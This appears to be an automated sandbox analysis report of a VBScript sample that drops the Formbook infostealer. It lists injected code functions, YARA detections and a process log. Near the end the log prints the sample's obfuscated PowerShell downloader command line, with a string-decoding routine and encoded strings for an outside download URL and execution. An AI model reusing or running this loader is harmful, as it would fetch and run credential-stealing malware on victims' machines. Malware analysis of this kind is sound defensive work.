Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22433D40 20_2_22433D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E1D5A 20_2_224E1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E7D73 20_2_224E7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243AD00 20_2_2243AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244FDC0 20_2_2244FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242ADE0 20_2_2242ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22448DBF 20_2_22448DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235A036 20_2_2235A036
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235B232 20_2_2235B232
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22355B30 20_2_22355B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22355B32 20_2_22355B32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22351082 20_2_22351082
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22358912 20_2_22358912
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22352D02 20_2_22352D02
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235E5CD 20_2_2235E5CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239A036 20_2_2239A036
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239B232 20_2_2239B232
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22395B30 20_2_22395B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22395B32 20_2_22395B32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22391082 20_2_22391082
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22398912 20_2_22398912
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22392D02 20_2_22392D02
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239E5CD 20_2_2239E5CD
Source: C:\Windows\explorer.exe Code function: 22_2_09350912 22_2_09350912
Source: C:\Windows\explorer.exe Code function: 22_2_0934AD02 22_2_0934AD02
Source: C:\Windows\explorer.exe Code function: 22_2_093565CD 22_2_093565CD
Source: C:\Windows\explorer.exe Code function: 22_2_09352036 22_2_09352036
Source: C:\Windows\explorer.exe Code function: 22_2_09349082 22_2_09349082
Source: C:\Windows\explorer.exe Code function: 22_2_0934DB30 22_2_0934DB30
Source: C:\Windows\explorer.exe Code function: 22_2_0934DB32 22_2_0934DB32
Source: C:\Windows\explorer.exe Code function: 22_2_09353232 22_2_09353232
Source: C:\Windows\explorer.exe Code function: 22_2_09AFD5CD 22_2_09AFD5CD
Source: C:\Windows\explorer.exe Code function: 22_2_09AF1D02 22_2_09AF1D02
Source: C:\Windows\explorer.exe Code function: 22_2_09AF7912 22_2_09AF7912
Source: C:\Windows\explorer.exe Code function: 22_2_09AF0082 22_2_09AF0082
Source: C:\Windows\explorer.exe Code function: 22_2_09AF9036 22_2_09AF9036
Source: C:\Windows\explorer.exe Code function: 22_2_09AF4B32 22_2_09AF4B32
Source: C:\Windows\explorer.exe Code function: 22_2_09AF4B30 22_2_09AF4B30
Source: C:\Windows\explorer.exe Code function: 22_2_09AFA232 22_2_09AFA232
Source: C:\Windows\explorer.exe Code function: 22_2_0B313232 22_2_0B313232
Source: C:\Windows\explorer.exe Code function: 22_2_0B30DB30 22_2_0B30DB30
Source: C:\Windows\explorer.exe Code function: 22_2_0B30DB32 22_2_0B30DB32
Source: C:\Windows\explorer.exe Code function: 22_2_0B310912 22_2_0B310912
Source: C:\Windows\explorer.exe Code function: 22_2_0B30AD02 22_2_0B30AD02
Source: C:\Windows\explorer.exe Code function: 22_2_0B3165CD 22_2_0B3165CD
Source: C:\Windows\explorer.exe Code function: 22_2_0B312036 22_2_0B312036
Source: C:\Windows\explorer.exe Code function: 22_2_0B309082 22_2_0B309082
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C85F64 25_2_00C85F64
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04502446 25_2_04502446
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04441460 25_2_04441460
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450F43F 25_2_0450F43F
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044FE4F6 25_2_044FE4F6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04507571 25_2_04507571
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04450535 25_2_04450535
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04510591 25_2_04510591
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044ED5B0 25_2_044ED5B0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045016CC 25_2_045016CC
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0446C6E0 25_2_0446C6E0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04474750 25_2_04474750
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04450770 25_2_04450770
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0444C7C0 25_2_0444C7C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450F7B0 25_2_0450F7B0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044FF0CC 25_2_044FF0CC
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044570C0 25_2_044570C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450F0E0 25_2_0450F0E0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045070E9 25_2_045070E9
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044D8158 25_2_044D8158
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0448516C 25_2_0448516C
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0443F172 25_2_0443F172
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0451B16B 25_2_0451B16B
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04440100 25_2_04440100
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044EA118 25_2_044EA118
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045081CC 25_2_045081CC
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0445B1B0 25_2_0445B1B0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045101AA 25_2_045101AA
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044F0274 25_2_044F0274
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0446B2C0 25_2_0446B2C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044D02C0 25_2_044D02C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044F12ED 25_2_044F12ED
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044552A0 25_2_044552A0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450A352 25_2_0450A352
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0443D34C 25_2_0443D34C
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450132D 25_2_0450132D
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0445E3F0 25_2_0445E3F0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045103E6 25_2_045103E6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0449739A 25_2_0449739A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04450C00 25_2_04450C00
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044C9C32 25_2_044C9C32
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450FCF2 25_2_0450FCF2
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04440CF2 25_2_04440CF2
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044F0CB5 25_2_044F0CB5
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04453D40 25_2_04453D40
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04501D5A 25_2_04501D5A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04507D73 25_2_04507D73
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0445AD00 25_2_0445AD00
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0446FDC0 25_2_0446FDC0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0444ADE0 25_2_0444ADE0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04468DBF 25_2_04468DBF
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04450E59 25_2_04450E59
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450EE26 25_2_0450EE26
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450EEDB 25_2_0450EEDB
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450CE93 25_2_0450CE93
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04462E90 25_2_04462E90
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04459EB0 25_2_04459EB0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044C4F40 25_2_044C4F40
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450FF09 25_2_0450FF09
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04492F28 25_2_04492F28
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04470F30 25_2_04470F30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04442FC8 25_2_04442FC8
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0445CFE0 25_2_0445CFE0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04451F92 25_2_04451F92
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450FFB1 25_2_0450FFB1
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044CEFA0 25_2_044CEFA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04452840 25_2_04452840
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0445A840 25_2_0445A840
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044BD800 25_2_044BD800
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044538E0 25_2_044538E0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0447E8F0 25_2_0447E8F0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044368B8 25_2_044368B8
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04459950 25_2_04459950
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0446B950 25_2_0446B950
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04466962 25_2_04466962
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044529A0 25_2_044529A0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0451A9A6 25_2_0451A9A6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04507A46 25_2_04507A46
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450FA49 25_2_0450FA49
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044C3A6C 25_2_044C3A6C
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044FDAC6 25_2_044FDAC6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0444EA80 25_2_0444EA80
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044EDAAC 25_2_044EDAAC
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04495AA0 25_2_04495AA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450AB40 25_2_0450AB40
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450FB76 25_2_0450FB76
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04506BD7 25_2_04506BD7
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0448DBF9 25_2_0448DBF9
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044C5BF0 25_2_044C5BF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0446FB80 25_2_0446FB80
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EC422 25_2_001EC422
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EE543 25_2_001EE543
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001ED5F9 25_2_001ED5F9
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001ED8B1 25_2_001ED8B1
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001D2D90 25_2_001D2D90
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EEDC5 25_2_001EEDC5
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001D9E50 25_2_001D9E50
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001D9E4C 25_2_001D9E4C
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EDF5E 25_2_001EDF5E
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001D2FB0 25_2_001D2FB0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041BA036 25_2_041BA036
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B2D02 25_2_041B2D02
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041BE5CD 25_2_041BE5CD
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B1082 25_2_041B1082
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B8912 25_2_041B8912
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041BB232 25_2_041BB232
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B5B32 25_2_041B5B32
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B5B30 25_2_041B5B30
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 044BEA12 appears 86 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 044CF290 appears 105 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 04485130 appears 36 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 00C90FD2 appears 117 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 04497E54 appears 96 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 0443B970 appears 265 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 224AF290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 22465130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 22477E54 appears 96 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2241B970 appears 265 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2249EA12 appears 82 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: birectangular.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_7748.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000016.00000002.2539715422.000000000B32B000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@539/14@3/2
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8A010 CoCreateInstance, 25_2_00C8A010
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C852BB __EH_prolog3_catch_GS,LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 25_2_00C852BB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Concordal6.Uds Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_in3jrmsk.4py.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs"
Source: C:\Windows\SysWOW64\raserver.exe Command line argument: offerraupdate 25_2_00C89AC5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7428
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7748
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
